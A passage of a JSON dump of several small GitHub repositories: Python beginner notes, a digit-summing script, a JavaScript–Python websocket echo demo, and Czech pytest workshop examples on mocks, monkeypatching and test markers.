[ { "alpha_fraction": 0.5648545026779175, "alphanum_fraction": 0.5808707475662231, "avg_line_length": 18.190475463867188, "blob_id": "c2bbf561fc4f2b915e7e30da8ce569ae34fe4a69", "content_id": "b31a7cadbafec94a9af291a11c0c26d9170e0517", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8866, "license_type": "no_license", "max_line_length": 184, "num_lines": 462, "path": "/basics.py", "repo_name": "cammac60/Python-notes", "src_encoding": "UTF-8", "text": "# VARIABLES:\n# No declaration\n#ex:\n\nfirst_var = \"varibale\"\n\n# Multiple declarations on the same line:\n\nsecond_var, third_var = 3, 4\n\n\n#-------------------------------------------------------------------------------\n\n\n# CONSOLE LOG/PRINT\n# Print to the console using:\n\nprint(\"Insert a string or a var\")\n# Output: \"Insert a string or a var\"\n\nprint(\"multiple things seperated by commas\", first_var)\n# Output: \"multiple things seperated by commas\" \"variable\"\n\n\n#-------------------------------------------------------------------------------\n\n\n# CONCATINATION/PLACEHOLDERS\n# A placeholder can be set using the % symbol followed by a letter in a string (%s for string, %d for num)\n# Ex:\n\nfirst_string = \"%s is learning python\"\n\n# Print the string above and add in a word like so:\n\nprint(first_string%(\"Cameron\"))\n\n# Output: \"Cameron is learning python\"\n\n# if a variable is being used the above example would change to:\n\nname = \"Cameron\"\nprint(first_string%name)\n\n# this can be done multiple times to the same string\n# ex:\n\nsecond_string = \"%s is learning python version %d\"\n\nprint(second_string%(\"Cameron\", 3))\n\n\n#-------------------------------------------------------------------------------\n\n\n# LISTS/ARRAYS\n\n# declare like so:\n\nfirst_list = [\"eggs\", \"milk\", \"coffee\", \"flour\"]\n\n# Accessed using bracket notation\n\nprint(first_list[0])\n\n# Output: \"eggs\"\n\n# Grab a portion of the array like so:\n\nprint(first_list[0:3])\n\n# Output: [\"eggs\", \"milk\", \"coffee\"]\n\n# First number represents starting point, second represents ending point. 
The end point will not be included in the return value so the example above grabs the items from index 0 to 2.\n\n# Use the append method to add an item to the end of the array\n# Ex:\n\nfirst_list.append(\"grapes\")\n\nprint(first_list)\n\n# Output: [\"eggs\", \"milk\", \"coffee\", \"flour\", \"grapes\"]\n\n# Use bracket notation to re-assign an index\n\n# Ex:\n\nfirst_list[0] = \"kiwis\"\n\nprint(first_list)\n\n# Output: [\"kiwis\", \"milk\", \"coffee\", \"flour\", \"grapes\"]\n\n# To remove an item from the array, use the del method\n\n# Ex:\n\ndel first_list[0]\n\nprint(first_list)\n\n# Output: [\"milk\", \"coffee\", \"flour\", \"grapes\"]\n\n# To see the amount of items in an array, use the len function\n\n# Ex:\n\nprint(len(first_list))\n\n# Output: 4\n\n# To add two arrays together, simply use the + operator\n\n# Ex:\n\nsecond_list = [\"bread\", \"cheese\"]\n\nprint(first_list + second_list)\n\n# Output: [\"milk\", \"coffee\", \"flour\", \"grapes\", \"bread\", \"cheese\"]\n\n# Use the max and min fn to find the max and min of a list\n\n# Ex:\n\nnumber_list = [1, 44, 5, 87, 3]\n\nprint(max(number_list), min(number_list))\n\n# Output: 87, 1\n\n\n#-------------------------------------------------------------------------------\n\n\n# OBJECTS/DICTIONARIES\n\n# Var Ex:\n\nstudents = {\"Bob\":34, \"Tim\":26, \"Sarah\":41}\n\n# Access using bracket notation\n# *If multiple keys have the same name, python will return the last one in the object when accessing\n\n# Ex:\n\nprint(students[\"Bob\"])\n\n# Output: 34\n\n# Re-assign:\n\nstudents[\"Tim\"] = 27\n\nprint(students[\"Tim\"])\n\n# Output: 27\n\n# Removing Elements:\n\ndel students[\"Bob\"]\n\nprint(students)\n\n# Output: {\"Tim\":27, \"Sarah\":41}\n\n# Find length:\n\nprint(len(students))\n\n# Output: 2\n\n\n#-------------------------------------------------------------------------------\n\n\n# TUPLES\n\n# The same as lists/arrays but immutable.\n\n# Declaration:\n\nfirst_tup = (1, 2, 3, 4, 5)\n\n# Tuples can still be added together or spliced\n# Tuples can still be deleted using the del method\n\n\n#-------------------------------------------------------------------------------\n\n\n# CONDITIONALS\n\n# Ex:\n\nif (5 > 3):\n print(\"true\")\n\nif (3 < 1):\n print(\"true\")\nelse:\n print(\"false\")\n\nif (3 == 3):\n print(\"true\")\n\n# Output: true, false, true\n# Use elif to add additional if statments\n# and replaces &&\n# or replaces ||\n\nage = 25\n\nif (age < 13):\n print(\"You can't see this PG-13 movie\")\nelif (age >= 13 and age < 18):\n print(\"You can see PG-13 but nor R\")\nelse:\n print(\"You can see whatever you want\")\n\n# Output: \"You can see whatever you want\"\n\n\n#-------------------------------------------------------------------------------\n\n\n# FOR LOOPS:\n\nlist1 = [\"apple\", \"orange\", \"cherry\"]\n\nfor item in list1:\n print(item)\n\n# Output: \"apple\", \"orange\", \"cherry\"\n\nfor i in range(0, 3):\n print(i)\n\n# Output 0, 1, 2\n\n# To increment by a certain amount, add an incementor as the third arg of orange\n\n# Ex:\n\nfor i in range(0, 10, 2):\n print(i)\n\n# Output: 0, 2, 4, 6, 8\n\n# Can be nested:\n\nfor i in range(0, 10, 2):\n for j in range(0, 6):\n print(i -j)\n\n\n#-------------------------------------------------------------------------------\n\n\n# WHILE LOOPS\n\nnum = 3\n\nwhile num <= 5:\n print(num)\n num = num + 1\n\n# Output: 3, 4, 5\n\n# Use break to end loop\n\nnum = 3\n\nwhile num < 6:\n print(num)\n if (num == 4):\n break\n num = num + 1\n\n# Use continue to stay in loop (In the 
example below, continue will skip on 3 and go back into the loop without running the print statement on the line below)\n\nnum = 0\n\nwhile num < 6:\n num = num + 1\n if (num == 3):\n continue\n print(num)\n\n# Output: 1, 2, 4, 5, 6\n# Use pass as a filler statement. For example, if you know you need an if statement but aren't sure what needs to go inside of it yet.\n\n\n#-------------------------------------------------------------------------------\n\n\n# TRY/EXCEPT\n\n# Operates the same as try and catch in JS\n\ntry:\n if undefined_var == 3:\n print(\"Hello\")\nexcept:\n print(\"The variable is undefined so we went into this block\")\n\n\n#-------------------------------------------------------------------------------\n\n\n# FUNCTIONS\n\n# Use def keyword to define methods followed by method name and parens for args. (Empty parens for no args)\n\n# Ex:\n\ndef hello_world():\n print(\"Hello world!\")\n\n# Fns are called in the same way as JS:\n\nhello_world()\n\ndef greeting(name):\n print(\"Hi \" + name + \"!\")\n\ngreeting(\"Cameron\")\n\ndef add_nums(num1, num2):\n print(num1 + num2)\n\nadd_nums(2, 5)\n\ndef return_num_sum(num1, num2):\n return num1 + num2\n\nsum = return_num_sum(10, 50)\n\nprint(sum)\n\n\n#-------------------------------------------------------------------------------\n\n\n# IN-BUILT FUNCTIONS\n\n# abs returns absolute\n\n# both examples will return 34:\n\nabs(-34)\nabs(34)\n\n# bool returns false if 0 or true if anything else\n\nbool(0) #false\nbool(100) #true\n\n# dir returns all in build methods that can be used on the specific data\n\ndir(\"Hello\") # returns all methods that are usable on a string\n\n# help method gives you more info on what the method will do when called on a specific piece of data:\n\nrandom_var = \"hello\"\n\n# help(random_var.upper)\n\n# this will return some info on what the upper method will do when called on random_var\n\n# eval takes strings and runs them as if they were python code:\n\nprint_str = 'print(\"hi\")'\n\neval(print_str)\n\n# Prints hi\n\n# *Use single quotations if the string needs to contain double quotes\n\n# exec() works the same as eval but is used for more complex multi-line code\n\n# int(), float(), and str() are used for converting datatypes\n\nint(\"1\") # = 1\nstr(1) # = \"1\"\nfloat(1) # = 1.0\n\n\n#-------------------------------------------------------------------------------\n\n\n# OOP/CLASSES\n\n# Use the class keyword to define a class\n\nclass Person:\n pass\n\n# Methods defined within the class must have the self param passed:\n\nclass Car:\n def get_make(self):\n print(\"Honda\")\n def get_model(self):\n print(\"Accord\")\n\ncar1 = Car()\n\ncar1.get_make() # prints Honda\ncar1.get_model() # prints Accord\n\n# self essentially tells the interperator which object is performing the method\n\n# to create custom params for each instance use __init__ (two underscores on both sides)\n\nclass City:\n def __init__(self, name, country):\n self.name = name\n self.country = country\n def get_name(self):\n print(\"This city is called \" + self.name)\n def get_country(self):\n print(\"This city is in \" + self.country)\n\ncity1 = City(\"Denver\", \"USA\")\n\ncity1.get_name()\ncity1.get_country()\n\n\n#-------------------------------------------------------------------------------\n\n\n# INHERITANCE\n\n\nclass Parent:\n def __init__(self):\n print(\"This is the parent class\")\n def parent_fn(self):\n print(\"This is the parent fn\")\n def same_name(self):\n print(\"parent\")\n\n# To create a child class, simply pass the 
parent class as a param when you create the child class:\n\nclass Child(Parent):\n def __init__(self):\n print(\"This is the child class\")\n def child_fn(self):\n print(\"This this the child fn\")\n def same_name(self):\n print(\"child\")\n\nc = Child()\n\n# methods from both the parent and child class can be called on the var class c\n# If two methods in the parent and child classes share the same name (ex: same_name ^^^) the child's method will replace the parents when a child is instantiated.\n\nc.same_name() # returns child\n" } ]
1
Karina9510/test_Python
https://github.com/Karina9510/test_Python
22b81ff40ebda428cd4576968e38517f4b7274d8
a3572da6da31ee30129d0e7e3c8747fadee8c010
f8c11d16f65ea20f16b70cb71ad48a5e818df031
refs/heads/main
2023-02-11T23:50:21.858782
2021-01-04T13:02:00
2021-01-04T13:02:00
326,685,052
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.44287267327308655, "alphanum_fraction": 0.4820457100868225, "avg_line_length": 13.298245429992676, "blob_id": "5e333c49aec24b26a732158c9fcd1871fa4136d2", "content_id": "c1fd13bbb7e73b601f8a689a4ee6af211d7772fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 919, "license_type": "no_license", "max_line_length": 39, "num_lines": 57, "path": "/rocniCislo.py", "repo_name": "Karina9510/test_Python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 4 12:11:29 2021\r\n\r\n@author: karina999\r\n\"\"\"\r\n\r\nfrom textwrap import wrap\r\nimport numbers\r\n\r\ns = \"13.5.1967\"\r\n\r\nvalues = wrap(s, 1)\r\n\r\nfor _ in range(5):\r\n del values[-1]\r\n \r\nprint(values)\r\n\r\ncelek = 0\r\n\r\nfor i in values: \r\n print(i)\r\n if i != \".\":\r\n celek = celek + int(i)\r\n print(\"je to celek\")\r\n print(celek)\r\n \r\n\r\nyear = \"2004\"\r\nyears = wrap(year, 1)\r\nprint(years)\r\n\r\ncelekYear = 0;\r\nfor i in years: \r\n celekYear = celekYear + int(i)\r\n print(celekYear)\r\n \r\n \r\n \r\ncislo = celek + celekYear\r\nprint(cislo)\r\n\r\nif cislo <= 9:\r\n print(\"cislo je\")\r\n print(cislo)\r\nelif cislo == 11:\r\n print(\"cislo je\")\r\n print(cislo)\r\nelse:\r\n print(\"cislo je\")\r\n list = [int(x) for x in str(cislo)]\r\n a = 0\r\n for i in list: \r\n a = a + i\r\n \r\n print(a) \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n " }, { "alpha_fraction": 0.5234375, "alphanum_fraction": 0.59375, "avg_line_length": 13.176470756530762, "blob_id": "a48e747230c4bd4c9a094aeb81acf54d6e844aec", "content_id": "0798bb7e48d7fa1cef0f8c96dff3a1ac3df747e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 256, "license_type": "no_license", "max_line_length": 55, "num_lines": 17, "path": "/rozdilMatic.py", "repo_name": "Karina9510/test_Python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 4 13:59:30 2021\r\n\r\n@author: karina999\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\n\r\nN = 4\r\n\r\ngrid = np.zeros((N, N), int)\r\nchoices = np.random.choice(grid.size, 6, replace=False)\r\ngrid.ravel()[choices] = 1\r\n\r\nprint(grid)" } ]
2
filipaivars/js_python_bidirectional_com
https://github.com/filipaivars/js_python_bidirectional_com
3f50a19beec9791784f37ab1ad926d33ad082c69
61ad0427ed7bdca80443efb84e9f1a2244b2866a
92bfec7385d2ad42609ec0f92f719a09ba44cc16
refs/heads/master
2020-12-12T17:53:43.529436
2020-01-16T00:32:37
2020-01-16T00:32:37
234,189,971
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7335723042488098, "alphanum_fraction": 0.7514934539794922, "avg_line_length": 58.71428680419922, "blob_id": "48d1f71baa7f5ac43f640ae109c22c08c352938f", "content_id": "b2ac09ea0419640e7128342d0253aa92983ab2de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 837, "license_type": "no_license", "max_line_length": 137, "num_lines": 14, "path": "/README.md", "repo_name": "filipaivars/js_python_bidirectional_com", "src_encoding": "UTF-8", "text": "# js_python_bidirectional_com\nBidirectional Communication Between Javascript and Python\n\n1. Launch Python server - `server.py`\n 1. This will launch the python server\n 2. Waiting for a message from the JS script (in-browser)\n2. Launch `index.html`\n 1. This will launch a webapp in your localhost\n 2. `index.html` has `manager.js` script imported\n 3. The JS script will send a message to your python server through port `8770`\n 4. Once the message is sent, you'll be able to check you received the message in the terminal in which you launched the python server\n 5. The python server will send back the same message received\n 6. In your browser console you'll be able to see a log checking you received the return message from the python server\n 7. Once you receive the message, the socket connection is closed\n\n" }, { "alpha_fraction": 0.6227461695671082, "alphanum_fraction": 0.633841872215271, "avg_line_length": 27.8799991607666, "blob_id": "9dad4b27e4a53b5cee8cf8048f2b997b963f4913", "content_id": "d0bce853dec7dae4f3a72fe37054c34a04c44b84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 721, "license_type": "no_license", "max_line_length": 100, "num_lines": 25, "path": "/scripts/manager.js", "repo_name": "filipaivars/js_python_bidirectional_com", "src_encoding": "UTF-8", "text": "var socket = new WebSocket('ws://localhost:8770/');\n\nsocket.onopen = function(event){\n socket.send('Hi');\n};\n\nsocket.onmessage = function(event){\n console.log(\"Message Received!\");\n console.log(event.data);\n socket.close() // this can be placed wherever it fits in your logic\n};\n\nsocket.onclose = function(event) {\n if (event.wasClean) {\n console.log(`[close] Connection closed cleanly, code=${event.code} reason=${event.reason}`);\n } else {\n // e.g. 
server process killed or network down\n // event.code is usually 1006 in this case\n console.log('[close] Connection died');\n }\n};\n\nsocket.onerror = function(error) {\n console.log(`[error] ${error.message}`);\n};" }, { "alpha_fraction": 0.5872235894203186, "alphanum_fraction": 0.5902948379516602, "avg_line_length": 21.013513565063477, "blob_id": "9868721fdd39575c5ef09f85f372f5907c4cf2f9", "content_id": "2a3305be96f64581f132974a975cc6ad993aa7b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1628, "license_type": "no_license", "max_line_length": 60, "num_lines": 74, "path": "/server.py", "repo_name": "filipaivars/js_python_bidirectional_com", "src_encoding": "UTF-8", "text": "# Note this is targeted at python 3\nimport tornado.web\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.websocket\nimport tornado.options\n\nLISTEN_PORT = 8770\nLISTEN_ADDRESS = 'localhost'\n\n\nclass MainHandler(tornado.websocket.WebSocketHandler):\n \"\"\"\n Handler that handles a websocket channel\n \"\"\"\n\n @classmethod\n def urls(cls):\n return [\n (r'/', cls, {}), # Route/Handler/kwargs\n ]\n\n def initialize(self):\n #self.channel = None\n print(\"initializing\")\n\n #def open(self, channel):\n def open(self):\n \"\"\"\n Client opens a websocket\n \"\"\"\n #self.channel = channel\n print(\"websocket opened\")\n\n def on_message(self, message):\n \"\"\"\n Message received on channel\n \"\"\"\n print(\"message received: \" + message)\n self.write_message(u\"You said: \" + message)\n #engine_AI.sendamessage(self)\n print(\"message sent\")\n\n def on_close(self):\n \"\"\"\n Channel is closed\n \"\"\"\n print(\"closing\")\n\n def check_origin(self, origin):\n \"\"\"\n Override the origin check if needed\n \"\"\"\n #print(\"origin\")\n #print(origin)\n return True\n\n\ndef main():\n # Create tornado application and supply URL routes\n application = tornado.web.Application([\n (r\"/\", MainHandler),\n ])\n\n # Setup HTTP Server\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(LISTEN_PORT, LISTEN_ADDRESS)\n\n # Start IO/Event loop\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == '__main__':\n main()" } ]
3
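The row above pairs a browser-side manager.js with a Tornado websocket server listening on port 8770. The same round-trip can also be driven from Python instead of a browser; the sketch below uses Tornado's client API and assumes server.py is already running - it is not a file from the repository.

```python
# Hypothetical Python stand-in for manager.js (assumes server.py is up on localhost:8770).
import asyncio
from tornado.websocket import websocket_connect

async def main():
    conn = await websocket_connect("ws://localhost:8770/")
    await conn.write_message("Hi")     # the same greeting manager.js sends
    reply = await conn.read_message()  # the server echoes back "You said: Hi"
    print(reply)
    conn.close()                       # mirrors socket.close() in the JS client

asyncio.run(main())
```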
vitsaidl/workshops
https://github.com/vitsaidl/workshops
2ab4ca0590ee7b69ae7ba72a3cd408544c324d51
09773e5d937bf01f72acb933bdb60ae6fbde7add
1c1c032f0f8a8f4de18089dab13b2cd76a31ddd4
refs/heads/master
2023-08-31T10:46:56.110882
2023-08-27T13:18:39
2023-08-27T13:18:39
242,579,894
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.6917229890823364, "alphanum_fraction": 0.7060810923576355, "avg_line_length": 31.452054977416992, "blob_id": "d1901801bfb6f2769918e36d748ac428811b655b", "content_id": "ee4db5aec242fac223205b9f5c760eb19840447e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2368, "license_type": "no_license", "max_line_length": 90, "num_lines": 73, "path": "/pytest/pytest_operative/tests/test_get_increment_by_five.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import some_tested_script\nimport pytest\n\ndef test_simple_example_1():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\ndef test_simple_example_2():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n \ndef test_simple_exercise():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\ndef test_trivial_exercise():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\[email protected]\ndef test_marked_as_computation():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n \[email protected]\ndef test_marked_as_something():\n orig_number = 1\n expected_result = 7\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n \[email protected]\ndef test_marked_as_computation_too():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\[email protected] \ndef test_to_skip():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\[email protected]\ndef test_to_maybe_fail():\n orig_number = 1\n expected_result = 6\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result \n \[email protected]\ndef test_to_fail():\n orig_number = 1\n expected_result = 7\n actual_result = some_tested_script.get_increment_by_five(orig_number)\n assert expected_result == actual_result\n\[email protected](\"some_input, expected_result\", [(11, 16), (20, 25), (20, 26)]) \ndef test_parametrized(some_input, expected_result):\n actual_result = some_tested_script.get_increment_by_five(some_input)\n assert expected_result == actual_result" }, { "alpha_fraction": 0.5740740895271301, "alphanum_fraction": 0.5802469253540039, "avg_line_length": 31.600000381469727, "blob_id": "9fa4e24333e649b7709d4b948750749ae54c2b04", "content_id": "2c654a26cf2277d50ebc4150c62e37d9f2f72305", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 162, "license_type": "no_license", "max_line_length": 60, "num_lines": 5, "path": "/pytest/contexts/script_for_context.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "def create_html_page()->None:\n page_text = \"<b>Hello world</b>\"\n \n with open(\"index.html\", \"w+\", encoding=\"utf-8\") as file:\n file.write(page_text)" }, { "alpha_fraction": 
0.7248520851135254, "alphanum_fraction": 0.7248520851135254, "avg_line_length": 36.66666793823242, "blob_id": "cfd20efcd8a0380c8144e46f4e0e048e22bbd248", "content_id": "7fe1668e6e9346a672d159b3a71335af030e8b5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 338, "license_type": "no_license", "max_line_length": 86, "num_lines": 9, "path": "/pytest/mocks/tests/test_get_frame_without_col.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_mocks\nfrom unittest.mock import Mock\n\ndef test_insert_in_mock_returns_something():\n    mocked_object = Mock()\n    mocked_object.drop.return_value = \"there should be a frame\"\n    returned_value = script_for_mocks.get_frame_without_col(mocked_object, \"some_col\")\n    \n    assert returned_value == \"there should be a frame\"" }, { "alpha_fraction": 0.6598150134086609, "alphanum_fraction": 0.6618704795837402, "avg_line_length": 27.647058486938477, "blob_id": "31de7e0b60f69d6ef378099d1c7891c24b2c5502", "content_id": "e465e56993ffc8689c6d24ae63a7707286611c5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 973, "license_type": "no_license", "max_line_length": 64, "num_lines": 34, "path": "/pytest/contexts/tests/test_create_html_page.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "from unittest.mock import Mock, MagicMock\nimport script_for_context\n\ndef test_open_called_once(monkeypatch):\n    fake_file_object = Mock()\n    \n    def fake_open(*args, **kwargs):\n        context_object = MagicMock()\n        context_object.__enter__.return_value = fake_file_object\n        return context_object\n    \n    monkeypatch.setattr(\"builtins.open\", fake_open)\n    \n    script_for_context.create_html_page()\n\n    assert 1 == fake_file_object.write.call_count\n\n\ndef test_open_called_with_expected_argument(monkeypatch):\n    fake_file_object = Mock()\n    \n    def fake_open(*args, **kwargs):\n        context_object = MagicMock()\n        context_object.__enter__.return_value = fake_file_object\n        return context_object\n    \n    monkeypatch.setattr(\"builtins.open\", fake_open)\n\n    script_for_context.create_html_page()\n    \n    expected_html_string = \"<b>Hello world</b>\"\n\n    args, _ = fake_file_object.write.call_args\n    assert expected_html_string == args[0]" }, { "alpha_fraction": 0.6932271122932434, "alphanum_fraction": 0.717131495475769, "avg_line_length": 31.5, "blob_id": "c3a57e1f9ba66fee0a561909a55da0826d823bce", "content_id": "f0e24460295347a01a9fc9a7c9df933e50a81bb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 251, "license_type": "no_license", "max_line_length": 83, "num_lines": 8, "path": "/pytest/first_tests/tests/test_get_sum_of_two_numbers.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import math_script\n\ndef test_expected_sum_returned():\n    first_number = 10\n    second_number = 32\n    expected_result = 42\n    actual_result = math_script.get_sum_of_two_numbers(first_number, second_number)\n    assert expected_result == actual_result" }, { "alpha_fraction": 0.6858638525009155, "alphanum_fraction": 0.6858638525009155, "avg_line_length": 26.285715103149414, "blob_id": "e2c6a7a8fe84e9d91c802b81f1cd94132fa0f61d", "content_id": "1e8e6a16f26504ccc9f2b4921036c41b0bd04cd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 191, "license_type": "no_license", "max_line_length": 54, "num_lines": 7, "path": 
"/pytest/pytest_operative/tests/test_get_some_list.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import some_tested_script\n\ndef test_this_will_fail():\n    expected_result = [\"three\"]\n    actual_result = some_tested_script.get_some_list()\n    \n    assert expected_result == actual_result\n" }, { "alpha_fraction": 0.694730818271637, "alphanum_fraction": 0.7038946151733398, "avg_line_length": 34.408164978027344, "blob_id": "4381aaaa2fe6952b893c8475126d1794de63fc2c", "content_id": "e1478f57a4b13ca7f5b0781ceff257af20c678ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1746, "license_type": "no_license", "max_line_length": 79, "num_lines": 49, "path": "/pytest/mocks/tests/test_do_something_with_frame.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import script_for_mocks\nfrom unittest.mock import Mock\n\ndef test_insert_called_two_times():\n    mocked_object = Mock()\n    script_for_mocks.do_something_with_frame(mocked_object)\n    expected_insert_calls = 2\n    actual_insert_calls = mocked_object.insert.call_count\n    \n    assert expected_insert_calls == actual_insert_calls\n\ndef test_insert_called_once():\n    mocked_object = Mock()\n    script_for_mocks.do_something_with_frame(mocked_object)\n    \n    mocked_object.insert.assert_called_once()\n    \ndef test_insert_called():\n    mocked_object = Mock()\n    script_for_mocks.do_something_with_frame(mocked_object)\n    \n    mocked_object.insert.assert_called()\n    \ndef test_drop_called():\n    mocked_object = Mock()\n    script_for_mocks.do_something_with_frame(mocked_object)\n    \n    mocked_object.drop.assert_called()\n\ndef test_insert_called_last_time_with_expected_params():\n    mocked_object = Mock()\n    script_for_mocks.do_something_with_frame(mocked_object)\n    expected_params = (1, \"another_column\", 142)\n    #because call_args is a call object which has the tuple at index 0\n    actual_params = mocked_object.insert.call_args[0]\n    assert expected_params == actual_params\n    \ndef test_insert_called_both_times_with_expected_params():\n    mocked_object = Mock()\n    script_for_mocks.do_something_with_frame(mocked_object)\n    \n    first_expected_params = (1, \"some_column\", 42)\n    second_expected_params = (1, \"another_column\", 142)\n\n    first_call_params, second_call_params = mocked_object.insert.call_args_list\n    first_actual_params = first_call_params[0]\n    second_actual_params = second_call_params[0]\n    assert first_expected_params == first_actual_params\n    assert second_expected_params == second_actual_params\n    \n\n\n " }, { "alpha_fraction": 0.7888198494911194, "alphanum_fraction": 0.7892635464668274, "avg_line_length": 96.9565200805664, "blob_id": "6dac037deb84ce152d4e639ecd64a6a811489ba9", "content_id": "f83d990fd61aa40b20fa2327b81a8071c4aae049", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2469, "license_type": "no_license", "max_line_length": 498, "num_lines": 23, "path": "/readme.md", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "# What is this?\nThis repository holds the materials for workshops/talks that I gave, give or will give at an unnamed corporation. Since it is more convenient for the participants to reach these materials on the \"outside\" internet, and since I worked on them in my free time anyway, I am publishing them here in a public repository instead of on the intranet. \nEach talk (or series of talks) has its own directory in the repository. It contains a Jupyter notebook as well as an HTML conversion of that notebook - notebooks do not render in IE. However, since the slightly more advanced topics more or less assume either Jupyter installed locally or the option of using a non-obsolete browser, I no longer consider the HTML conversion necessary for those. Other materials, usually py files, may appear here as well. \nIf you spot a mistake or a misleading formulation, please report it in Issues. \nAfter clicking on a notebook (ipynb file) you may see the message \"Sorry, something went wrong. Reload?\". In that case go [here](https://nbviewer.jupyter.org/) and paste the notebook address into the text field, e.g. https://github.com/vitsaidl/workshops/blob/master/machine_learning/machine_learning.ipynb. \nEDIT - since I have found that this repository also works well as a collection of self-contained notes for when I need to refresh something at work, things that have little to do with any workshop will occasionally appear here too.\n\n# Current materials \n- Intro to Python (from \"Hello world\" to functions) \n- Continuation of the intro, focused on objects in Python \n- Pandas - basic usage, analogies to SQL, loading and saving, visualization \n- Regular expressions (primarily for Python, but Notepad++ and Teradata are covered too) \n- Machine learning - data preparation, a few basic algorithms, interpretability, pipelines \n- Saving ML models in the ONNX format and then using those models in Java (machine_learning directory) \n- Adversarial attacks (machine_learning directory) \n- Text - NLP basics \n- Text - using OpenAI and Langchain \n- Creating plots in Python \n- Introduction to PyTorch \n- Working with data and ML in PySpark \n- A collection of short texts on various Python packages \n- Elasticsearch \n- Neo4j " },
{ "alpha_fraction": 0.5956284403800964, "alphanum_fraction": 0.6202185750007629, "avg_line_length": 21.6875, "blob_id": "46158810dd16b038db0a3a9ec77ca63636481043", "content_id": "9717fd8623cc050c7c4db20227242e57b3451b1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 366, "license_type": "no_license", "max_line_length": 53, "num_lines": 16, "path": "/pytest/monkeypatching/script_for_monkeypatching.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "import pandas as pd\nfrom numpy import sqrt\nfrom typing import List\n\ndef get_some_frame()->pd.DataFrame:\n    some_frame = pd.DataFrame({\n        \"first_col\": [1, 2, 3],\n        \"second_col\": [10, 20, 30]\n    })\n    \n    frame_from_method = some_frame.copy()\n\n    return frame_from_method \n\ndef get_list_sqrt(input_list:List[int])->List[float]:\n    return sqrt(input_list) " }, { "alpha_fraction": 0.6529411673545837, "alphanum_fraction": 0.658823549747467, "avg_line_length": 23.428571701049805, "blob_id": "232ac2335581e7ac60004eca9b29995e54e008d6", "content_id": "3b61579fc918f9f7cde487988ea125921a12bb30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 170, "license_type": "no_license", "max_line_length": 48, "num_lines": 7, "path": "/pytest/pytest_operative/some_tested_script.py", "repo_name": "vitsaidl/workshops", "src_encoding": "UTF-8", "text": "from typing import List\n\ndef get_increment_by_five(orig_number:int)->int:\n    return orig_number + 5\n\ndef get_some_list() -> List[str]:\n    return [\"one\", \"two\", \"three\"]" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.699999988079071, "avg_line_length": 14.25, "blob_id": 
